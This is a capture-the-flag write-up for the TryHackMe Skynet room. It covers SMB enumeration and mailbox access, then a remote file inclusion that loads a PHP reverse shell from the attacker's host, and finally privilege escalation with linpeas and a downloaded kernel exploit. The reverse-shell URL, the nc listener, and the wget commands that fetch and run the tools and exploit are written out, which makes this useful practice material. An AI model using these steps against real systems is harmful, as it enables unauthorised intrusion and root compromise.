[Writeup] TryHackMe — Skynet — Another privesc approach

ROOM: https://tryhackme.com/room/skynet

Let me show you another way than the official writeup you can find here https://blog.tryhackme.com/skynet-writeup/.

First things first, let’s scan:

Looks like too much info, but we just got ssh, web, pop3, imapd and samba.

First change versus the official writeup, I’ll use dirsearch instead of gobuster:

We’ve an squirrelmail but no credentials:

Go back to check SMB with “anonymous” users:

Check the content of these retrieved files :

Note that in SMB we get a shared called “milesdyson” and here we got a list of plausible passwords, so if you try these combinations into Squirrel. You’ll find out soon the correct password.

In the Squirrel Inbox you’ll find a juicy mail:

We gonna use this password to access into “milesdyson” shared folder:

Here you’ll find a lot of PDF but a directory called notes. Inside this folder it’s also full of PDF files but there’s a plain text file called important.txt, let’s gonna take it:

Now we got a new path for a CMS, these won’t be discovered by a regular execution of gobuster or dirsearch:

Well, this doesn’t look like a regular CMS and its source code doesn’t show anything interesting… Let’s gonna check with dirsearch in this path:

Uhm… “Administrator”… Here’s a CMS:

We don’t event want to login, let’s gonna check on exploit-db:

Juicy RFI! Let’s gonna check how it works on https://www.exploit-db.com/exploits/25971:

Let’s gonna use the famous https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

That’s the thing

1. Download the php-reverse-shell:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

2. Set you private IP with a text editor or just:

sed -i ‘s/127.0.0.1/<your_ip>/g’

3. Serve php-reverse-shell.php file, I use:

python -m SimpleHTTPServer 80

4. Maintain a netcat or nc listening on port 1234 if you didn’t change the default port on php-reverse-shell.php

nc -lvp 1234

5. Open a web browser and go to:

http://10.10.24.172/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<your_ip>/php-reverse-shell.php?

Eh voilà! Reverse shell running as www-data. Now you can retrieve the user flag.

Time to privesc. That’s the new part that you won’t find on the official writeup which uses an approach based on crontabs, here we’ll use a kernel exploit:

1. Download into your kali the linpeas.sh script in the same path where you’re serving with SimpleHTTPServer, ~/thm/skynet in my case:

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

2. From reverse shell get the script

wget http://<yourip>/linpeas.sh

3. Give executable right and launch linpeas.sh:

chmod u+x linpeas.sh

./linpeas.sh

Just in the few first lines we already have a red indicator, the kernel version:

Let’s gonna search on exploit-db:

Fine, we got two verified version, we’ll try the latest:

1. From your kali, download the raw into the path your serving with SimpleHTTPServe:

wget https://www.exploit-db.com/raw/43418

2. From the reverse shell, get this exploit

wget http://<your_ip>/43418

3. Rename, compile and run:

Enjoy!